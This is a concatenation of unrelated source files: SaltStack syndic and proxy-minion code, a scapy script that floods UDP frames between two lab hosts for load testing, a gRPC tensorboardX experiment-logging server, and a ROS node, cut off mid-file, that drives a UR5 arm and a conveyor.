    def iter_master_options(self, master_id=None):
        '''
        Iterate (in order) over your options for master
        '''
        masters = list(self._syndics.keys())
        if self.opts['syndic_failover'] == 'random':
            shuffle(masters)
        # Start with the requested master if known, otherwise the first option
        if master_id not in self._syndics:
            master_id = masters.pop(0)
        else:
            masters.remove(master_id)

        while True:
            yield master_id, self._syndics[master_id]
            if not masters:
                break
            master_id = masters.pop(0)

    def _reset_event_aggregation(self):
        # Drop all aggregated-but-unsent returns and events
        self.job_rets = {}
        self.raw_events = []

    def reconnect_event_bus(self, something):
        # Re-attach the event handler whenever the event-bus future resolves
        future = self.local.event.set_event_handler(self._process_event)
        self.io_loop.add_future(future, self.reconnect_event_bus)

    # Syndic Tune In
    def tune_in(self):
        '''
        Lock onto the publisher. This is the main event loop for the syndic
        '''
        self._spawn_syndics()
        # Instantiate the local client
        self.local = salt.client.get_local_client(
            self.opts['_minion_conf_file'], io_loop=self.io_loop)
        self.local.event.subscribe('')

        log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])

        # register the event sub to the poller
        self.job_rets = {}
        self.raw_events = []
        self._reset_event_aggregation()
        future = self.local.event.set_event_handler(self._process_event)
        self.io_loop.add_future(future, self.reconnect_event_bus)

        # forward events every syndic_event_forward_timeout
        self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
                                                              self.opts['syndic_event_forward_timeout'] * 1000,
                                                              )
        self.forward_events.start()

        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()

        self.io_loop.start()

    def _process_event(self, raw):
        # TODO: cleanup: Move down into event class
        mtag, data = self.local.event.unpack(raw, self.local.event.serial)
        log.trace('Got event %s', mtag)  # pylint: disable=no-member

        tag_parts = mtag.split('/')
        # Job-return events look like salt/job/<jid>/ret/<minion>
        if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
                salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
                'return' in data:
            if 'jid' not in data:
                # Not a job return
                return
            if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
                log.debug('Return received with matching master_id, not forwarding')
                return

            master = data.get('master_id')
            jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
            if not jdict:
                jdict['__fun__'] = data.get('fun')
                jdict['__jid__'] = data['jid']
                jdict['__load__'] = {}
                fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
                # Only need to forward each load once. Don't hit the disk
                # for every minion return!
                if data['jid'] not in self.jid_forward_cache:
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](data['jid'])
                        )
                    self.jid_forward_cache.add(data['jid'])
                    if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
                        # Pop the oldest jid from the cache
                        tmp = sorted(list(self.jid_forward_cache))
                        tmp.pop(0)
                        self.jid_forward_cache = set(tmp)
            if master is not None:
                # __'s to make sure it doesn't print out on the master cli
                jdict['__master_id__'] = master
            ret = {}
            for key in 'return', 'retcode', 'success':
                if key in data:
                    ret[key] = data[key]
            jdict[data['id']] = ret
        else:
            # TODO: config to forward these? If so we'll have to keep track of who
            # has seen them
            # if we are the top level masters-- don't forward all the minion events
            if self.syndic_mode == 'sync':
                # Add generic event aggregation here
                if 'retcode' not in data:
                    self.raw_events.append({'data': data, 'tag': mtag})

    def _forward_events(self):
        log.trace('Forwarding events')  # pylint: disable=no-member
        if self.raw_events:
            # Swap out the buffer before sending so new events keep accruing
            events = self.raw_events
            self.raw_events = []
            self._call_syndic('_fire_master',
                              kwargs={'events': events,
                                      'pretag': tagify(self.opts['id'], base='syndic'),
                                      'timeout': self._return_retry_timer(),
                                      'sync': False,
                                      },
                              )
        if self.delayed:
            # Retry returns that previously failed to send, to any master
            res = self._return_pub_syndic(self.delayed)
            if res:
                self.delayed = []
        for master in list(six.iterkeys(self.job_rets)):
            values = list(six.itervalues(self.job_rets[master]))
            res = self._return_pub_syndic(values, master_id=master)
            if res:
                del self.job_rets[master]
class ProxyMinionManager(MinionManager):
    '''
    Create the multi-minion interface but for proxy minions
    '''
    def _create_minion_object(self, opts, timeout, safe,
                              io_loop=None, loaded_base_name=None,
                              jid_queue=None):
        '''
        Helper function to return the correct type of object
        '''
        # Identical to the parent behavior except that ProxyMinion
        # instances are produced instead of plain Minions.
        proxy_kwargs = {
            'io_loop': io_loop,
            'loaded_base_name': loaded_base_name,
            'jid_queue': jid_queue,
        }
        return ProxyMinion(opts, timeout, safe, **proxy_kwargs)
def _metaproxy_call(opts, fn_name):
    '''
    Resolve *fn_name* from the metaproxy module configured in *opts*.

    Falls back to the standard 'proxy' metaproxy when no 'metaproxy' key
    is present in the options.
    '''
    loaded = salt.loader.metaproxy(opts)
    if 'metaproxy' in opts:
        driver = opts['metaproxy']
    else:
        driver = 'proxy'
        log.trace(
            'No metaproxy key found in opts for id %s. '
            'Defaulting to standard proxy minion.',
            opts['id']
        )
    return loaded['{0}.{1}'.format(driver, fn_name)]
class ProxyMinion(Minion):
    '''
    This class instantiates a 'proxy' minion--a minion that does not manipulate
    the host it runs on, but instead manipulates a device that cannot run a minion.

    Every override below simply delegates to the function of the same role
    resolved from the configured metaproxy module via _metaproxy_call().
    '''
    # TODO: better name...
    @tornado.gen.coroutine
    def _post_master_init(self, master):
        '''
        Function to finish init after connecting to a master

        This is primarily loading modules, pillars, etc. (since they need
        to know which master they connected to)

        If this function is changed, please check Minion._post_master_init
        to see if those changes need to be propagated.

        ProxyMinions need a significantly different post master setup,
        which is why the differences are not factored out into separate helper
        functions.
        '''
        mp_call = _metaproxy_call(self.opts, 'post_master_init')
        return mp_call(self, master)

    def _target_load(self, load):
        '''
        Verify that the publication is valid and applies to this minion
        '''
        mp_call = _metaproxy_call(self.opts, 'target_load')
        return mp_call(self, load)

    def _handle_payload(self, payload):
        # Delegate raw payload handling to the metaproxy implementation
        mp_call = _metaproxy_call(self.opts, 'handle_payload')
        return mp_call(self, payload)

    @tornado.gen.coroutine
    def _handle_decoded_payload(self, data):
        # Delegate decoded-payload (job) handling to the metaproxy
        mp_call = _metaproxy_call(self.opts, 'handle_decoded_payload')
        return mp_call(self, data)

    @classmethod
    def _target(cls, minion_instance, opts, data, connected):
        # Class-level dispatch; delegated to the metaproxy
        mp_call = _metaproxy_call(opts, 'target')
        return mp_call(cls, minion_instance, opts, data, connected)

    @classmethod
    def _thread_return(cls, minion_instance, opts, data):
        # Single-function job return path; delegated to the metaproxy
        mp_call = _metaproxy_call(opts, 'thread_return')
        return mp_call(cls, minion_instance, opts, data)

    @classmethod
    def _thread_multi_return(cls, minion_instance, opts, data):
        # Multi-function job return path; delegated to the metaproxy
        mp_call = _metaproxy_call(opts, 'thread_multi_return')
        return mp_call(cls, minion_instance, opts, data)
class SProxyMinion(SMinion):
    '''
    Create an object that has loaded all of the minion module functions,
    grains, modules, returners etc. The SProxyMinion allows developers to
    generate all of the salt minion functions and present them with these
    functions for general use.
    '''
    def gen_modules(self, initial_load=False):
        '''
        Tell the minion to reload the execution modules

        CLI Example:

        .. code-block:: bash

            salt '*' sys.reload_modules

        NOTE: the loader calls below are strictly order-dependent -- each
        loaded component is packed into the next one's dunder namespace.
        '''
        self.opts['grains'] = salt.loader.grains(self.opts)
        self.opts['pillar'] = salt.pillar.get_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            saltenv=self.opts['saltenv'],
            pillarenv=self.opts.get('pillarenv'),
        ).compile_pillar()

        # A proxy minion cannot run without a 'proxy' configuration block
        if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
            errmsg = (
                'No "proxy" configuration key found in pillar or opts '
                'dictionaries for id {id}. Check your pillar/options '
                'configuration and contents. Salt-proxy aborted.'
            ).format(id=self.opts['id'])
            log.error(errmsg)
            self._running = False
            raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)

        if 'proxy' not in self.opts:
            self.opts['proxy'] = self.opts['pillar']['proxy']

        # Then load the proxy module
        self.proxy = salt.loader.proxy(self.opts)
        self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
        self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
        self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
        self.matchers = salt.loader.matchers(self.opts)
        self.functions['sys.reload_modules'] = self.gen_modules
        self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)

        fq_proxyname = self.opts['proxy']['proxytype']

        # we can then sync any proxymodules down from the master
        # we do a sync_all here in case proxy code was installed by
        # SPM or was manually placed in /srv/salt/_modules etc.
        self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])

        # Cross-pack the loaded components into each other's namespaces
        self.functions.pack['__proxy__'] = self.proxy
        self.proxy.pack['__salt__'] = self.functions
        self.proxy.pack['__ret__'] = self.returners
        self.proxy.pack['__pillar__'] = self.opts['pillar']

        # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
        self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
        self.proxy.pack['__utils__'] = self.utils

        # Reload all modules so all dunder variables are injected
        self.proxy.reload_modules()

        # The proxy module must implement at least init() and shutdown()
        if ('{0}.init'.format(fq_proxyname) not in self.proxy
                or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
            errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
                     'Check your proxymodule. Salt-proxy aborted.'
            log.error(errmsg)
            self._running = False
            raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)

        self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
        proxy_init_fn = self.proxy[fq_proxyname + '.init']
        proxy_init_fn(self.opts)

        # Re-gather grains now that the proxy connection is initialized
        self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)

        # Sync the grains here so the proxy can communicate them to the master
        self.functions['saltutil.sync_grains'](saltenv='base')
        self.grains_cache = self.opts['grains']
        self.ready = True
|
h1_h2_traffic_load.py | #!/usr/bin/python
# Copyright 2020-2021 PSNC
# Author: Damian Parniewicz
#
# Created in the GN4-3 project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from scapy.all import Ether, IP, sendp, get_if_hwaddr, get_if_list, TCP, Raw, UDP
from scapy.config import conf
import sys
from time import sleep, time
from multiprocessing import Process
# --- Packet/flow configuration for host h1 -> host h2 ---
src_mac = "00:00:00:00:01:01"  # Ethernet source address (h1)
data = "ABCDFE"  # static payload carried in every packet
src_ip = "10.0.1.1"  # IPv4 source (h1)
dst_mac = "00:00:00:00:02:02"  # Ethernet destination address (h2)
dst_ip = "10.0.2.2"  # IPv4 destination (h2)
# First available interface whose name contains "eth0"
# (raises IndexError at startup if none exists)
interface = [i for i in get_if_list() if "eth0" in i][0]
# Raw L2 socket opened once and shared by all sender processes
s = conf.L2socket(iface=interface)
# Pre-build the Ether/IP/UDP frame once; send() transmits it unchanged
p = Ether(dst=dst_mac,src=src_mac)/IP(frag=0,dst=dst_ip,src=src_ip)
p = p/UDP(sport=0x11FF, dport=0x22FF)/Raw(load=data)
def send(id):
    """
    Transmit the pre-built frame in a tight loop forever, printing the
    achieved packets-per-second rate roughly once a second, tagged with
    this sender's *id*.
    """
    sent = 0
    window_start = time()
    while True:
        s.send(p)
        sent += 1
        if time() - window_start > 1.0:
            print("[%d]Pkt/s: %d" % (id, sent))
            sent = 0
            window_start = time()
if __name__ == "__main__":
    # Launch three parallel sender processes to maximize offered load
    procs = []
    for id in range(3):
        proc = Process(target=send, args=(id,))
        procs.append(proc)
        proc.start()
    # send() loops forever, so these joins block until the processes
    # are killed externally (e.g. Ctrl-C)
    for proc in procs:
        proc.join()
|
ExperimentServer.py | import os
import time
import grpc
import multiprocessing
import traceback
import numpy as np
from signal import signal, SIGTERM
from concurrent import futures
from threading import Lock
from readerwriterlock import rwlock
from typing import Any, Dict
import tensorboardX
from malib.rpc.chunk import deserialize, recv_chunks, deserialize_image
from malib.rpc.proto import exprmanager_pb2, exprmanager_pb2_grpc
from malib.utils.convert import (
utc_to_str,
dump_dict,
grpc_struct_to_dict,
tensor_to_dict,
)
class _ConcurrentTable:
    """
    Thread-safe registry mapping a log-directory name to an index, and the
    index to a (threading.Lock, tensorboardX.SummaryWriter) pair.

    Reads take a shared read lock; inserts take the exclusive write lock.
    """

    def __init__(self):
        self.lock = rwlock.RWLockFair()
        # table[0]: {name: idx}; table[1]: {idx: (Lock, SummaryWriter)}
        self.table = [{}, {}]

    def close(self):
        """Close every registered writer, serializing on its own lock."""
        for idx, (lock, writer) in self.table[1].items():
            with lock:
                writer.close()

    def put(self, name):
        """
        Return the index registered for *name*, creating a new writer and
        index on first use.
        """
        with self.lock.gen_rlock():
            if name in self.table[0]:
                return self.table[0][name]
        with self.lock.gen_wlock():
            # BUG FIX: re-check under the write lock. The original checked
            # under the read lock only, so two threads racing on the same
            # new name could both insert, leaking a duplicate writer and
            # clobbering the first index.
            if name in self.table[0]:
                return self.table[0][name]
            idx = len(self.table[0])
            self.table[0][name] = idx
            writer = tensorboardX.SummaryWriter(name)
            self.table[1][idx] = (Lock(), writer)
            return idx

    def get(self, index):
        """Return the (lock, writer) pair registered under *index*."""
        with self.lock.gen_rlock():
            wlock, writer = self.table[1][index]
        return wlock, writer
class ExperimentManagerRPCServicer(exprmanager_pb2_grpc.ExperimentManagerRPCServicer):
    """
    gRPC servicer that receives experiment-logging RPCs (text, scalars,
    images, objects, tensors) and writes them to tensorboardX writers.

    Writers are shared through *global_writer_table* (a _ConcurrentTable);
    each RPC looks up the (lock, writer) pair by the table key carried in
    the request and serializes writes with that lock. Every Send* method
    replies with status=1 on success and status=0 on any internal error.
    """

    def __init__(
        self,
        global_writer_table,
        logdir="./",
        flush_freq: int = -1,
        debug=False,
        verbose=False,
    ):
        """
        :param global_writer_table: shared name->writer registry.
        :param logdir: root directory under which run directories are created.
        :param flush_freq: accepted for API compatibility; currently unused.
        :param debug: print every incoming request when True.
        :param verbose: print internal errors when True.
        """
        super().__init__()
        self.root_dir = logdir
        self.table = global_writer_table
        self.debug = debug
        self.verbose = verbose

    def CreateTable(self, table_name, context):
        """Create (or reuse) a writer for primary/secondary and return its key."""
        if self.debug:
            print(
                "Get CreateTable Request:\n", dump_dict(grpc_struct_to_dict(table_name))
            )
        rec_path = os.path.join(self.root_dir, table_name.primary, table_name.secondary)
        try:
            os.makedirs(rec_path)
        except Exception as e:
            # The directory may already exist; creation failure is non-fatal.
            if self.verbose:
                print("Error detected in making directory ", e)
        idx = -1
        # key=-1 signals to the caller that registration failed
        idx = -1
        try:
            idx = self.table.put(rec_path)
        except Exception:
            # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
            # are not swallowed.
            traceback.print_exc()
        return exprmanager_pb2.TableKey(key=idx, time=time.time())

    def SendText(self, text, context):
        """Write a text entry to the writer identified by text.key."""
        if self.debug:
            print("Get SendText Request:\n", text.text)
        try:
            lock, writer = self.table.get(text.key)
            with lock:
                writer.add_text(
                    text.tag, text.text, global_step=text.step, walltime=text.time
                )
            return exprmanager_pb2.SendReply(status=1, time=time.time())
        except Exception as e:
            if self.verbose:
                print("InternalError detected:", e)
            return exprmanager_pb2.SendReply(status=0, time=time.time())

    def SendScalar(self, scalar, context):
        """Write a scalar (whichever oneof field is set) to the keyed writer."""
        if self.debug:
            print("Get SendScalar Request:\n", dump_dict(grpc_struct_to_dict(scalar)))
        try:
            lock, writer = self.table.get(scalar.key)
            scalar_type = scalar.WhichOneof("ScalarType")
            val = getattr(scalar, scalar_type)
            with lock:
                writer.add_scalar(
                    scalar.tag, val, global_step=scalar.step, walltime=scalar.time
                )
            return exprmanager_pb2.SendReply(status=1, time=time.time())
        except Exception as e:
            if self.verbose:
                print("InternalError detected:", e)
            return exprmanager_pb2.SendReply(status=0, time=time.time())

    def SendImage(self, binary_iterator, context):
        """Reassemble a chunked image and write it to the keyed writer."""
        if self.debug:
            print("Get SendImage Request")
        try:
            serial_img, fields = recv_chunks(binary_iterator, "blocks")
            lock, writer = self.table.get(fields["key"])
            # The "tensor" field distinguishes encoded images from raw arrays
            if "tensor" in fields and not fields["tensor"]:
                img = deserialize_image(serial_img)
                img = np.array(img)
            else:
                img = deserialize(serial_img)
            if self.debug:
                print(img.shape)
            # HWC -> CHW (first 3 channels only), as expected by add_image
            img = np.transpose(img[:, :, 0:3], [2, 0, 1])
            with lock:
                writer.add_image(
                    tag=fields["tag"],
                    img_tensor=img,
                    global_step=fields["step"],
                    walltime=fields["time"],
                )
            return exprmanager_pb2.SendReply(status=1, time=time.time())
        except Exception as e:
            if self.verbose:
                print(traceback.format_exc())
                print("InternalError detected:", e)
            return exprmanager_pb2.SendReply(status=0, time=time.time())

    def SendObj(self, binary_iterator, context):
        """
        Reassemble a chunked object and log it.

        The special tag "__Payoff__" is rendered as a markdown table of
        population/reward info; any other dict is flattened into scalars.
        """
        if self.debug:
            print("Get SendObj Request")
            print("Receiver currently act as method: send scalars")
        try:
            serial_obj, fields = recv_chunks(binary_iterator, "blocks")
            obj = deserialize(serial_obj)
            lock, writer = self.table.get(fields["key"])
            # Received internal info, currently only payoff
            if fields["tag"] == "__Payoff__":
                with lock:
                    writer.add_text(
                        "payoff_update_info",
                        "\n".join(
                            [
                                f"Update-SendTime-{utc_to_str(fields['time'])}:\n",
                                "* Population:\n",
                                "| AgentName |"
                                + "".join(
                                    [
                                        f" {agent} |"
                                        for agent, _ in obj["Population"].items()
                                    ]
                                ),
                                "| :-: |"
                                + "".join(
                                    [" :-: |" for _, _ in obj["Population"].items()]
                                ),
                                "| Policy |"
                                + "".join(
                                    [
                                        f" {pid} |"
                                        for _, pid in obj["Population"].items()
                                    ]
                                )
                                + "\n",
                                "* Reward:\n",
                                "| AgentName | "
                                + "".join(
                                    f" {agent} |" for (agent, _) in obj["Agents-Reward"]
                                ),
                                "| :-: |"
                                + "".join([" :-: |" for _, _ in obj["Agents-Reward"]]),
                                "| Reward |"
                                + "".join(
                                    f" {reward} |"
                                    for (_, reward) in obj["Agents-Reward"]
                                )
                                + "\n",
                            ]
                        ),
                        global_step=fields["step"],
                        walltime=fields["time"],
                    )
            else:

                def _flatten_obj(obj: Dict):
                    # Flatten nested dicts into {"outer/inner": float} entries;
                    # non-float leaves are unsupported.
                    res = {}
                    for k, v in obj.items():
                        if isinstance(v, Dict):
                            temp_dict = _flatten_obj(v)
                            for tk, tv in temp_dict.items():
                                res[f"{k}/{tk}"] = tv
                        elif isinstance(v, float):
                            res[k] = v
                        else:
                            raise NotImplementedError
                    return res

                with lock:
                    # TODO(ming): flatten obj key
                    obj = _flatten_obj(obj)
                    for k, v in obj.items():
                        writer.add_scalar(
                            f"{fields['tag']}/{k}",
                            v,
                            global_step=fields["step"],
                            walltime=fields["time"],
                        )
            return exprmanager_pb2.SendReply(status=1, time=time.time())
        except Exception as e:
            if self.verbose:
                print("InternalError detected:", e)
            return exprmanager_pb2.SendReply(status=0, time=time.time())

    def SendBinaryTensor(self, binary, context):
        """
        Receive a tensor sent over rpc connection.

        In current implementation, the tensor is only printed in command shell
        since tensorboardX does not support adding tensors.

        Future: needed in sacred version experiment manager

        :param binary: received binary rpc structs as predefined in exprmanager.proto
        :param context: rpc context
        """
        if self.debug:
            print("Get SendBinaryTensor Request")
        try:
            serial_tensor, key = recv_chunks(binary, "blocks")
            tensor = deserialize(serial_tensor)
            if self.debug:
                field_description = grpc_struct_to_dict(binary, skip_fields=["blocks"])
                # BUG FIX: dict.update() returns None, so the original
                # print(field_description.update(...)) always printed 'None'.
                # Update the dict first, then print it.
                field_description.update(tensor_to_dict(tensor))
                print(field_description)
            return exprmanager_pb2.SendReply(status=1, time=time.time())
        except Exception as e:
            if self.verbose:
                print("InternalError detected:", e)
            return exprmanager_pb2.SendReply(status=0, time=time.time())
class ExprManagerServer:
    """
    Owns the gRPC server instance and the shared writer table used by the
    ExperimentManagerRPCServicer.
    """
    # NOTE(review): this class-level default is immediately shadowed by the
    # instance attribute assigned in __init__; kept as-is for compatibility.
    table = None

    def __init__(
        self, port, logdir="./", grace=5, max_workers=10, debug=False, verbose=False
    ):
        # port: value handed to grpc's add_insecure_port.
        #   NOTE(review): gRPC expects an address string such as
        #   '[::]:50051'; confirm callers pass that form, not a bare int.
        # grace: seconds given to in-flight RPCs when stop() is called.
        self.port = port
        self.grace = grace
        self.server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers))
        self.table = _ConcurrentTable()
        exprmanager_pb2_grpc.add_ExperimentManagerRPCServicer_to_server(
            ExperimentManagerRPCServicer(
                global_writer_table=self.table,
                logdir=logdir,
                debug=debug,
                verbose=verbose,
            ),
            self.server,
        )
        self.server.add_insecure_port(self.port)

    def start(self):
        # Non-blocking: spins up the server's worker threads.
        self.server.start()

    def wait(self):
        # Blocks the calling thread until the server terminates.
        self.server.wait_for_termination()

    def stop(self):
        # Stop accepting RPCs (allowing `grace` seconds for in-flight ones)
        # and close all tensorboard writers.
        self.server.stop(grace=self.grace)
        self.table.close()
def _create_logging(**kwargs):
    """
    Child-process entry point: run an ExprManagerServer until SIGTERM.

    :param kwargs: forwarded verbatim to ExprManagerServer.__init__.
    """
    s = ExprManagerServer(**kwargs)
    s.start()
    print("Logger server up!")

    def terminate_server(*_):
        # SIGTERM handler: shut the server down cleanly before exiting.
        s.stop()
        print("Logging server stop")

    signal(SIGTERM, terminate_server)
    # Block here until the server terminates (normally via SIGTERM above).
    s.wait()
def start_logging_server(**kwargs):
    """
    Build (but do not start) a process running the logging server.

    NOTE(review): despite the name, the process is only created here --
    .start() is never called, so callers must start it themselves.
    Confirm call sites before changing this behavior.

    :param kwargs: forwarded to ExprManagerServer via _create_logging.
    :return: the un-started multiprocessing.Process.
    """
    process = multiprocessing.Process(target=_create_logging, kwargs=kwargs)
    return process
|
node_t5_ur5_2.py | #! /usr/bin/env python
"""
Controls the UR5 near the bins to pick up boxes from the conveyor.
Borrows methods from :mod:`lib_task5` to aid execution, and uses
multithreading to operate the UR5_2 and conveyor simultaneously.
"""
import os
import threading
import json
import datetime
from math import radians
import rospy
from rospy.exceptions import ROSInterruptException
import geometry_msgs.msg
from hrwros_gazebo.msg import LogicalCameraImage
from std_msgs.msg import String
from lib_task5 import Ur5Moveit # The library for the UR5s
from node_iot_action_client import RosIotBridgeActionClient # ROS-IoT Bridge Client
def env_data():
    """
    Data of all environment-specific parameters:

    1. Vacuum Gripper Width
    2. Box Size
    3. Home Position Joint angles for the UR5

    :return: All environment-specific data specified in the function.
    :rtype: list
    """
    box_length = 0.15  # Length of the box
    vacuum_gripper_width = 0.117  # Vacuum Gripper Width
    # Home pose joint angles, degrees converted to radians
    home_joint_angles = [radians(angle)
                         for angle in (0, -120, -85, -65, 90, 0)]
    return [box_length,
            vacuum_gripper_width, home_joint_angles]
def pose_set(trans, rot):
    """
    Assigns pose values w.r.t the world-frame to a PoseStamped object.

    :arg list(float) trans: Translation Values.
    :arg list(float) rot: RPY Rotation Values.
    :returns: The complete pose with values.
    :rtype: PoseStamped object
    """
    # If you want to override any values, use this
    # NOTE(review): `override` is always truthy, so the hard-coded
    # quaternion below unconditionally replaces the `rot` argument --
    # the incoming rotation is effectively ignored. Confirm this fixed
    # end-effector orientation is intended.
    override = [trans, [-0.5, -0.5, 0.5, 0.5]]
    if override:
        trans = override[0]
        rot = override[1]
    pose = geometry_msgs.msg.PoseStamped()
    pose.header.frame_id = 'world'
    pose.pose.position.x = trans[0]
    pose.pose.position.y = trans[1]
    pose.pose.position.z = trans[2]
    # rot is consumed as a quaternion (x, y, z, w), not RPY as documented
    pose.pose.orientation.x = rot[0]
    pose.pose.orientation.y = rot[1]
    pose.pose.orientation.z = rot[2]
    pose.pose.orientation.w = rot[3]
    return pose
def box_plan(box_name, box_length, vacuum_gripper_width):
    """
    Pick-planning for the boxes.

    Uses the module-level globals UR5 (Ur5Moveit instance) and ENV_VALUES
    (presumably the list returned by env_data() -- defined elsewhere in
    this file; confirm).

    :arg str box_name: The name of the box as detected through the Logical Camera.
    :arg float box_length: The size of the box in metres.
    :arg float vacuum_gripper_width: The width of the vacuum gripper.
    """
    # Offset for end effector placement
    delta = vacuum_gripper_width + (box_length / 2)
    # Obtaining the TF transform of the box
    (box_trans, box_rot) = UR5.tf_listener.lookupTransform("/world",
                                                           "/logical_camera_2_%s_frame" % box_name,
                                                           rospy.Time(0))
    # Execute pick operation
    box_pose = pose_set(box_trans, box_rot)  # Collating pose values
    box_pose.pose.position.z = box_pose.pose.position.z + delta  # Adding Z Offset
    UR5.hard_go_to_pose(box_pose, 3)  # Executing pick travel
    # Activate Vacuum Gripper (shelling out to the ROS service CLI)
    os.system\
    (
        'rosservice call /eyrc/vb/ur5/activate_vacuum_gripper/ur5_2 "activate_vacuum_gripper: true"\n'
    )
    # Travelling back to home
    UR5.hard_set_joint_angles(ENV_VALUES[2], 3)
    # Restart the conveyor once the package has been lifted clear
    os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 100"')
    # Log the operation
    rospy.logwarn(
        "Package '%s' picked!" % box_name)
class UR5Two(object):
    """
    Class for the module.

    :var float package_pos: Stores the conveyor position of the detected box.
    :var str package_name: Stores models' names from :meth:`camera_callback`.
    :var list(str) package_colours: Stores package colours from :meth:`package_callback`.
    :var bool ready_flag: Start-stop variable for operation of the UR5_2.
    :var dict order: The current order to be shipped.
    :var rospy.Subscriber sub_package_colour: Subscriber to receive the list of colours
        from the Logical Camera.
    """

    def __init__(self):
        """
        Constructor containing essential data.
        """
        self.package_pos = 0  # Stores the conveyor position of the detected box
        self.package_name = ''  # String to store models' names from camera_callback()
        self.package_colours = []  # String list to store packages colours from package_callback()
        self.ready_flag = False  # Start-stop variable
        self.order = {}  # The current dispatched order to be shipped
        self.sub_package_colour = rospy.Subscriber('/package_colour',
                                                   String,
                                                   self.package_callback)
        rospy.Subscriber('/eyrc/vb/logical_camera_2',
                         LogicalCameraImage,
                         self.camera_callback)
        rospy.Subscriber('/dispatched_order', String, self.order_callback)

    def smart_stop(self):
        """
        Multithreading function for conveyor start-stop.

        Polls the latest Logical Camera reading and stops the conveyor when a
        package is within reach of the arm; restarts it otherwise.
        """
        # Conveyor Signal variable (True while the conveyor is powered)
        power_flag = False
        # Exit cleanly on node shutdown (the original `while True` kept the
        # non-daemon thread alive forever and the process could not exit).
        while not rospy.is_shutdown():
            if ('packagen' in self.package_name) and (abs(self.package_pos) < 0.4):
                if power_flag:
                    os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 0"')
                    self.ready_flag = True
                    power_flag = False
            elif not power_flag:
                os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 100"')
                power_flag = True
            # Brief pause between polls; the original tight loop pinned a CPU
            # core at 100% while adding no detection benefit.
            rospy.sleep(0.01)

    def camera_callback(self, msg_camera):
        """
        Callback function for Conveyor Logical Camera Subscriber
        :arg LogicalCameraImage msg_camera:
            Data about all the objects detected by the Logical Camera.
        """
        if msg_camera.models:
            # When two models are visible the first is presumably the arm/belt
            # itself, so track the second one — TODO confirm against camera output.
            if len(msg_camera.models) == 1:
                self.package_name = msg_camera.models[0].type
                self.package_pos = msg_camera.models[0].pose.position.y
            else:
                self.package_name = msg_camera.models[1].type
                self.package_pos = msg_camera.models[1].pose.position.y

    def order_callback(self, msg_order):
        """
        Callback function to receive the data of the currently dispatched order from UR5_1.
        :arg str msg_order: A JSON string dump of the order data dictionary.
        """
        self.order = json.loads(msg_order.data)

    def package_callback(self, msg_package_list):
        """
        Callback function for the package colour decoder Subscriber.
        :arg list(str) msg_package_list: CSV-formatted list of all the package colours in order.
        """
        temp_var = msg_package_list.data.split(',')  # Converting the CSV
        # Only accept a complete 9-slot configuration with no unknown entries
        if len(temp_var) == 9 and 'NA' not in temp_var:
            rospy.logwarn("Configuration stored:")
            rospy.logwarn(temp_var)
            self.sub_package_colour.unregister()
            self.package_colours = temp_var

    def bin_plan(self):
        """
        Place-planning for the bins.
        """
        # Map priority to bin, shipping estimate and terminal colour code.
        # Initialise with LP defaults so an unexpected priority value cannot
        # leave ship_time unbound (the original raised NameError in that case).
        bin_name = "g"
        ship_time = datetime.timedelta(days=5)
        colour_code = '92'
        if self.order["Priority"] == "HP":
            bin_name = "r"
            ship_time = datetime.timedelta(days=1)
            colour_code = '91'
        elif self.order["Priority"] == "MP":
            bin_name = "y"
            ship_time = datetime.timedelta(days=3)
            colour_code = '93'
        # Travel to bin
        UR5.moveit_play_planned_path_from_file(UR5.file_path +
                                               'ur5_2/', 'home_to_%s.yaml' % bin_name[0])
        # Deactivate the Gripper
        os.system(
            'rosservice call /eyrc/vb/ur5/activate_vacuum_gripper/ur5_2 "activate_vacuum_gripper: false"\n'
        )
        # Log the operation (colour_code already matches the selected bin; the
        # original recomputed it here redundantly)
        rospy.loginfo(
            '\033[{}m{} Package with order ID {} shipped! \033[0m'.format(
                colour_code, self.order["Priority"],
                self.order["Order ID"]))
        ship_instant = datetime.datetime.now()
        # Update order shipping status
        order = {"id": "OrdersShipped",
                 "Team Id": "VB#1202",
                 "Unique Id": "isAmiTvb",
                 "Order ID": self.order["Order ID"],
                 "City": self.order["City"],
                 "Item": self.order["Item"],
                 "Priority": self.order["Priority"],
                 "Shipped Quantity": self.order["Dispatch Quantity"],
                 "Cost": self.order["Cost"],
                 "Shipped Status": "YES",
